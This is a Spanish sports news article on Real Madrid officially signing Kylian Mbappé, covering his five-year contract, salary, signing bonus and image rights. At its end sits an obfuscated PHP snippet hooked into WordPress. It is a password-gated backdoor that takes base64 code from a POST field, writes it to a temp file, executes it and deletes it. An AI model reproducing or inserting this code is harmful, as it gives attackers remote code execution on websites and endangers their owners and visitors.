Oficial: ¡El Madrid ficha a Mbappé!

El club hace oficial la contratación de la estrella francesa. Llega con la carta de libertad después de la operación frustrada en 2022. Firma cinco años.

Fin al culebrón. El Real Madrid ha hecho oficial la contratación de Kylian Mbappé (25 años), que firma por el club blanco hasta 2029. El fichaje era un secreto a voces desde que el PSG anunciara en el mes de febrero que la estrella no seguiría en las filas del equipo de propiedad qatarí. Sólo era cuestión de tiempo que quedara anunciada una de las operaciones más esperadas de los últimos tiempos. Con la llegada de Mbappé, Florentino Pérez reedita la época galáctica en la que coincidieron en la plantilla futbolistas como Figo, Zidane, Beckham o Ronaldo. Ahora, Mbappé (con un valor de mercado de 180 millones de euros según la web especializada Transfermarkt) se une a Bellingham (también 180 millones) y Vinicius (150). Tres de los cuatro jugadores más caros del planeta actúan ahora en el remodelado Santiago Bernabéu.

El fichaje de Mbappé por el Real Madrid se ha hecho oficial ahora a pesar de que el jugador francés tiene contrato con el PSG hasta el 30 de junio. De cualquier manera, la normativa de la FIFA le permitía negociar (y firmar) por cualquier otro club desde el 1 de enero. Tanto Mbappé como el Real Madrid decidieron esperar para anunciarlo a que se jugara la final de la Champions, que ha levantado el Real Madrid, para no desviar la atención de tan importante cita. Del mismo modo, se decidió hacer el anuncio antes del comienzo de la Eurocopa para restar presión a la estrella en el torneo que se disputa en Alemania. Ahora sólo queda esperar a la presentación, que está prevista, precisamente, para después de la Eurocopa, en torno al 15 o 16 de julio. Se hará en un Bernabéu lleno hasta la bandera al más puro estilo de las presentaciones galácticas. Cristiano ya llenó el feudo blanco en 2009 en su puesta de largo.

La llegada de Mbappé al Real Madrid se ha hecho esperar más de lo que inicialmente había ideado Florentino Pérez. Han pasado dos años desde que el francés sorprendiera al mundo del fútbol (y sobre todo al Real Madrid) anunciando que renovaba por el PSG cuando parecía un hecho su fichaje por la entidad blanca. “Estoy muy contento de continuar aquí, en París, que es mi casa. Quiero quedarme porque quiero seguir ganando muchos trofeos para vosotros”, dijo entonces, el 21 de mayo de 2022. Toda esa declaración de amor ha quedado ahora en papel mojado. Mbappé sólo se había comprometido con el PSG por dos temporadas más, hasta el verano de 2024, y la tercera quedaba pendiente de una cláusula que sólo el propio Mbappé podía activar de manera unilateral. Finalmente ha podido más el deseo de la estrella de hacer historia con el Real Madrid, no ha activado esa cláusula y jugará en el equipo blanco las próximas cinco temporadas. Una operación que se da a conocer de forma oficial ahora pero que lleva diseñada y cerrada desde hace varios meses. Los últimos flecos que se cerraron hacían referencia a los derechos de imagen.

Su sueldo en el Real Madrid

Mbappé ha renunciado a una cantidad importante de dinero para cumplir su sueño de vestir la camiseta blanca. Actualmente estaba cobrando en París 70 millones de euros después de impuestos. Sólo de sueldo. El Real Madrid nunca pudo llegar a esa cifra y ha decidido no romper del todo la escala salarial de la plantilla y pagar a Mbappé 15 millones de euros netos. Lo que no ha trascendido es la prima de fichaje que se lleva el francés. Es una manera encubierta de pagarle más. Si esa prima fuera de 100 millones y firma cinco años, el Madrid estaría sumando 20 millones de euros al año a esos 15 de sueldo.

El otro punto conflictivo en las negociaciones de la estrella con el Real Madrid ha sido el referente a sus derechos de imagen. Se ha deslizado desde el entorno del jugador que poseerá el 80% de esos derechos, este sí, un buen bocado económico que servirá para pagar también a la estrella. Ese porcentaje siempre sobre los contratos que sobrevengan después de la firma con el club. Los anteriores, lógico, son 100% propiedad del francés. Son muchos los millones que están en juego. Según la última lista de Forbes publicada en 2023, Mbappé genera ahora 20 millones de euros al año en publicidad. Pero esta cifra se incrementará, en mucho, a partir de la firma de su contrato con el Real Madrid, porque eso le proporcionará otra dimensión mundial.

El Real Madrid se ha hecho fuerte en su posición negociadora con el francés después de lo sucedido en 2022, cuando dejó compuesto y sin novia al club renovando con el PSG. “El tren sólo pasa una vez en la vida”, deslizaban desde el Bernabéu para que el crack francés se hiciera a la idea de que la oferta esta vez no iba a ser tan suculenta como lo fue en 2022. Entre otras cosas porque Mbappé llega a un Madrid diferente en el que Vinicius es ya una estrella Mundial y en el que ha aterrizado Bellingham, figura planetaria con el mismo foco que el propio Mbappé. Por otro lado, y como gran diferencia con respecto a lo que ocurrió en 2022 cuando la estrella dio calabazas al Madrid, esta vez Mbappé tuvo que firmar un documento que asegurase su llegada o el pago de una multa más que millonaria. Pero esta vez sí que Mbappé estaba convencido de que era el momento de enfundarse la camiseta blanca en la que lucirá el dorsal 9. El 10 que luce con Francia era otra posibilidad, pero una vez que se ha clarificado la continuidad de Modric no hay dudas al respecto.

Las negociaciones entre Mbappé y el Real Madrid comenzaron después de 1 de enero, cuando el reglamento de la FIFA ya permitía, a seis meses de la finalización de su contrato, hablar al futbolista con cualquier otro club. El PSG no puede poner ningún pero a la actuación del Madrid, que incluso llegó a ofrecer 180 millones por Mbappé cuando le quedaba sólo un año de contrato. Ese fue el primer intento de fichaje, en 2021. El segundo, en 2022, cuando el propio Mbappé dejó en la estacada al Madrid aunque estaba todo cerrado para que llegara con su carta de libertad bajo el brazo. Ahora, a la tercera va la vencida. Florentino ha perseguido el sueño de traer al mejor futbolista del planeta… hasta hacerlo realidad.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}